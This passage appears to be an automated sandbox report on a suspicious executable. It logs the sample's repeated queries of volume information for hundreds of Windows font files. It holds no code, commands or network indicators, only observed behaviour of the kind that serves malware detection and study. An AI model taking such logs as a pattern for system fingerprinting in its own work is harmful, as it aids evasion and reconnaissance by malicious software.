          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
